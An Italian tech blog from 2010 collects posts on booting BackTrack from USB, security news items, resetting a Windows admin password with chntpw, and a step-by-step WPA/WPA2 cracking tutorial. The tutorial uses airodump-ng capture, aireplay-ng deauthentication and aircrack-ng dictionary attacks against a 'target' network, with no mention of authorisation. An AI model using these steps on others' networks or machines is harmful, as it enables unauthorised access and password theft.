martedì 14 dicembre 2010

UNetbootin - Linux a portata di chiavetta

Nel seguente post vorrei illustrarvi come creare una "chiavetta USB" con una ditribuzione qualsiasi live di linux, in particolare Backtrack 4 r2.

Per prima cosa scarichiamoci UNetbootin da questo indirizzo http://unetbootin.sourceforge.net/, scegliete la versione in base al vostro sistema operativo.

Oltre al programma ci serve anche la ISO di Backtrack che possiamo trovare a questo indirizzo :  http://www.backtrack-linux.org/downloads/
Consiglio di scaricare tramite torrent che è molto veloce e in un oretta dovreste aver finito.

Ora prima di aprire il programma ci serve una chiavetta USB (consiglio almeno da 2 GB) formattata in FAT32, anche nel caso in cui fosse vuota consiglio in ogni caso di formattarla.

Finito il passaggio precedente, possiamo aprire il programma precedentemente scaricato.


Come si può vedere dall'immagine, ci sono 2 modi per installare una distro su una chiavetta.

  1. Possiamo selezionare "Distribution" e scegliere la versione che più ci interessa...
  2. Oppure selezionare "Disk Image" e andare a prendere la nostra ISO, in questo caso di Backtrack 4 r2, sul nostro hard disk.
Quindi, appena finito di scaricare Backtrack, selezioniamo "Disk Image" poi "ISO" e infine andiamo a inserire il percorso della posizione della nostra distro.

Ultima cosa da fare è selezionare "Type: USB Drive" e come "Drive:" la lettera che corrisponde alla nostra chiavetta formattata.

Clickate su "OK" e il gioco è fatto! Aspettate che l'installazione finisca e spegnete il computer.

Per far partire il sistema operativo (Backtrack) dalla chiavetta e non quello presente sull'hard disk, dobbiamo andare a modificare alcune impostazioni nel BIOS. Per entrare nel BIOS dovete avere il PC spento, accendete e nel mentre premete ripetutamente il tasto CANC (questo cambia da sistema a sistema, in alcuni è CANC in altri F2, in ogni caso il caro e vecchio Google ci saprà consigliare ^__^) e si vi dovrebbe comparire una schermata BLU simile a questa:


Importante: nel BIOS potete usare solo la tastiera (Freccette, INVIO, ecc)

Come potete vedere nell'immagine, in alto a destra c'è una sezione di nome "Boot", andate li e cercare qualcosa simile a "Boot device priority" e con F5-F6 spostate in prima posizione "USB HDD" o qualcosa di simile.

Ovviamente per ogni BIOS è diverso e non tutti supportano il Boot da chiavetta. Se il PC è più vecchio di 4-5 anni potreste non trovare l'opzione.

Spero di essere stato abbastanza chiaro, in ogni caso se avete qualche problema scrivete pure nei commenti.













Virus - Aumenta la durata delle Batterie




È stato scoperto, dall'Università del Maryland, un virus (questa volta non di computer) in grado di ampliare la durata di una batteria fino  a 10 volte.

Il virus, chiamato modaco, è un parassita delle piante di tabacco e non solo. 

Questo permetterà, a parità di dimensioni, di creare batteria con una durata molto maggiore oppure di dimensioni ridotte.

Se pensiamo che in media una batteria agli ioni di litio dura 4 ore , provate ad immaginare 10 volte tanto! :-) 

Quindi, speriamo presto, potremo dire addio alle doppie batterie e agli alimentatori sempre dietro per avitare di rimanere con un laptop inutilizzabile.

Fonte: zeusnews






lunedì 13 dicembre 2010

Gli hacker rubano i dati dei clienti di McDonald's

McDonald´s sta lavorando con le forze dell´ordine dopo che degli hacker sono entrati nella banche dati di un´altra società e hanno rubato le informazioni di un numero imprecisato di clienti della catena di fast food.
McDonald´s ha avvertito i clienti, a cui sono stati potenzialmente rubati i dati, sia via e-mail che attraverso un messaggio sul sito di McDonald´s.

Fonte: http://www.hwstation.net

Attacco hacker a Gawker.com: rubate milioni di password

Rubate numerose password utente, probabilmente nell'ordine dei milioni, con un attacco hacker ai danni di Gawker.com. La società consiglia di modificare le password, soprattutto se utilizzate per altri servizi. Gawker è la società che pubblica anche Gizmodo, il sito web che a maggio pubblicò le prime immagini dell'iPhone 4 smarrito dall'ingegnere di Cupertino. 

 Fonte : http://www.macitynet.it

Facebook istituisce una coppa per gli Hacker

Si arruolano hacker su Facebook, ma questa volta non c'entrano né gli amici né i nemici di Wikileaks. Il social network lancia dal prossimo 20 dicembre la Hacker Cup, una competizione internazionale aperta a tutti gli sviluppatori di software nel mondo. Il premio in denaro non è esorbitante, 5.000 dollari al primo classificato e, rispettivamente, 2.000 e 1.000 al secondo e al terzo, ma quel che farà più gola agli hacker di tutto il globo sarà l'accesso ai sancta sanctorum dell'informatica statunitense, e la possibilità di far mostra di sé davanti alle teste d'uovo della Silicon Valley.

Fonte: http://www.lastampa.it

Wikileaks, i DDos non sono così anonimi

L'arresto del sedicenne olandese accusato di aver partecipato agli attacchi contro i siti di Mastercard e Visa l'ha dimostrato: non è saggio improvvisarsi pirati informatici.
L'Università di Twente, nei Paesi Bassi, ha infatti pubblicato un breve studio in cui mostra come chi intenda intraprendere questo genere di attività non può limitarsi a utilizzare uno strumento preconfezionato, ma dovrebbe attivamente pensare a proteggersi.
Il Low Ion Orbit Cannon - lo strumento utilizzato per sferrare gli attacchi DDoS, da solo non fornisce i mezzi per rendersi anonimi: per questo motivo i pirati più "seri" utilizzano sistemi anonimizzanti come TOR per evitare di rendere pubblico il proprio indirizzo IP.
I ricercatori dell'Università di Twente paragonano l'utilizzo di LOIC dal proprio computer a inondare la cassetta della posta di qualcuno con migliaia di lettere, ognuna delle quali porta ben chiaro l'indirizzo del mittente.
Né si può sentire al sicuro chi finora - ad attacchi conclusi - non è ancora stato rintracciato dalle forze dell'ordine: per legge gli ISP devono conservare i dati di connessione dei loro utenti per sei mesi. C'è dunque ancora tempo perché la polizia possa suonare al campanello di questi "pirati della domenica".

Fonte:  http://www.zeusnews.it

Microsoft, 17 bollettini per l'ultimo patch Tuesday del 2010

Martedì prossimo Microsoft rilascerà gli ultimi aggiornamenti del 2010 per i propri prodotti.
Per l'occasione l'azienda ha preparato la bellezza di 17 bollettini di sicurezza che riguardano 40 vulnerabilità in tutti i sistemi operativi supportati e in tutte le versioni di Office supportate.
Due di questi bollettini sono classificati come critici, quattordici importanti e uno moderato

Fonte: http://www.zeusnews.it/

Automated WEP & WPA script!

Ho da poco trovato questi due interessantissimi script per Linux che, a quanto pare, permettono di craccare reti WEP e WPA (Tramite brute force) in automatico lanciando un semplice script!




Ringrazio il forum di backtrack e il creatore dello script

Backtrack “Cambiare Password Admin”



Oggi parliamo di come cambiare la password di un Admin su un sistema Windows XP/Vista.
Per prima cosa dobbiamo smontare la nostra partizione di Windows nel mio caso “hde1″ (per sapere in quale partizione è il Sistema Operativo, usare konqueror… la stringa sarà simile a “media: hde1″):
  • umount /dev/hde1
Adesso dobbiamo creare una cartella in cui montare successivamente la nostra partizione di windows:
  • mkdir /mnt/win
Ora montiamo nella cartella win la partizione contenente il SO:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win
Se il precedente comando restituisce un errore provare con:
  • mount -t ntfs-3g /dev/hde1/ /mnt/win -o force
Ora, grazie al programma chntpw, possiamo vedere la lista degli utenti presenti nel SO e fare le modifiche che preferiamo:
  • chntpw -i /mnt/win/WINDOWS/system32/config/SAM
Una volta che abbiamo la lista degli utenti possiamo modificare quello che vogliamo cambiando il nome “fittizio” con il nome dell’utente:
  • chntpw -u fittizio /mnt/win/WINDOWS/system32/config/SAM
Nel caso la password fosse “Blank” si può provare a cancellare la password usando un’altra opzione con il comando chntpw -i /mnt/win/WINDOWS/system32/config/SAM

WPA/WPA2 'Brute Force' Crack



Oggi parleremo di come cracckare una rete protetta da cifratura WPA o WPA2.
Il metodo è simile a quello usato per le reti WEP, con la differenza che qui abbiamo bisogno di un “Dizionario” (word list). Analizzando la rete dobbiamo catturare l’HANDSHAKE appartenente a quella rete e usare la FORZA BRUTA per trovare la PASSWORD.
In cosa consiste questa BRUTE FORCE? In pratica una volta trovato questo HANDSHAKE noi proviamo tutte le parole/lettere/numeri   presenti nella nostra WORDLIST in modo da trovarne la PSK (pre shared key).
E’ facile capire che se noi abbiamo una wordlist da 10.000.000 di parole e la nostra password è alla fine di questa lista, ci vorrà molto tempo prima di trovare la password corretta. Solitamente un dual core può analizzare circa 300-400 pass al secondo. A questo problema ci viene in contro la nuova tecnologia CUDA di nVidia che permette di sfruttare la potenza di calcolo della nostra GPU (della scheda video), ma di questo ne parleremo in un altro articolo.
Dopo questa premessa, la prima cosa da fare per craccare una WPA/WPA2 è avere una buona WORDLIST. Queste si possono reperire molto facilmente su internet (GOOGLE) oppure è possibile crearsene una personale, ma anche di questo ne parleremo in un altro articolo.
Adesso che abbiamo la nostra wordlist, possiamo cominciare con il vero divertimento:


1) Mettiamo la nostra scheda wifi in monitor mode
sudo airmon-ng start wlan0

-wlan0 è l’interfaccia wifi  (usare iwconfig da terminale per vedere la propria)
Molto probabilmente verrà creata un’interfaccia mon0 al posto di wlan0,  noi useremo sempre mon0 dopo questo passaggio.

2) Ora tramite la monitor mode possiamo scansionare la rete in cerca di AP con protezione WPA/WPA2
sudo airodump-ng –write cap mon0

-   –write crea dei pacchetti cap.cap
- mon0 è l’interfaccia wlan0 in monitor mode
In questo modo possiamo vedere tutte le reti presenti nelle vicinanze e scegliere il nostro bersaglio.

3) Ora concentriamoci sul nostro obiettivo:
sudo airodump-ng -c [canale AP] –bssid [MAC AP] –write cap mon0

Uguale a prima, ma in questo modo analizziamo solo i pacchetti di un singolo AP. La rete deve essere PSK (pre shared key) altrimenti non è possibile usare il brute force e quindi non è possibile tentare di craccarla.

4) Usare aireplay-ng per  deautenticare il client connesso
aireplay-ng -0 5 -a [MAC AP] -c [MAC mia scheda] mon0

-0 è il  deauthentication mode
-5  è il numero di  gruppi  di pacchetti  deauthentication da mandare
Terminato questo comando, nella SHELL dove abbiamo eseguito il punto 3, dovremo vedere comparire il alto a destra “HANDSHAKE”, se questo non compare non possiamo cracckare la rete.

5) Avviare  aircrack-ng per recuperare la  pre-shared key
aircrack-ng -w [dizionario] -b [MAC AP] cap*.cap

-w dizionario è il nome del file dizionario
-  *.cap è il l’lenco dei file di capture che abbiamo collezionato
Se tutto è andato a buon fine avremo come risultato un bellissimo KEY FOUND!

Spesso capita di non riuscire a trovare l’HANDSHAKE, questo può essere dovuto al fatto che per poterlo catturare è necessario essere nella stessa modalità (a/b/g/n) e averete lo stesso rate di dati dell’AP. Possiamo risolvere questo problema provando diverse modalità e diversi rate:

6) Cambiare il rate
iwconfig ath0 rate [auto,1M,2M,5.5M,6M,9M,11M,18M,24M,36M,48M,54M]

A volte la soluzione migliore può essere provare subito  1M  come rate.

7) Cambiare la modalità
iwpriv ath0 mode 2

Mode 0 Automatic (a/b/g)
Mode 1 solo 802.11a
Mode 2 solo 802.11b
Mode 3 solo 802.11g

Per ulteriori chiarimenti o suggerimenti sull’articolo scrivetemi pure.